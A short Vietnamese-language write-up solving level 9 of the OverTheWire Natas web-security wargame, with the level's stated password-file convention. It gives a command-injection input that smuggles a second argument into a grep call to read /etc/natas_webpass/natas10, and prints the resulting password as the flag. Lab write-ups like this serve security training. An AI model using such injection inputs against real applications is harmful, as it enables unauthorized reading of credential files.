[OverTheWire] Natas – Level 09

http://natas9.natas.labs.overthewire.org/

Find words containing…

Nhấn View sourcecode:
[php]

[/php]

Cú pháp lệnh grep có thể tham khảo tại:

• http://www.gnu.org/savannah-checkouts/gnu/grep/manual/grep.html

Thông tin được cung cấp từ đầu:

Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.

Do biến $key không bị escape, ta có thể inject bằng input sau:

'' /etc/natas_webpass/natas10;

Kết quả:

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

→ flag = nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu.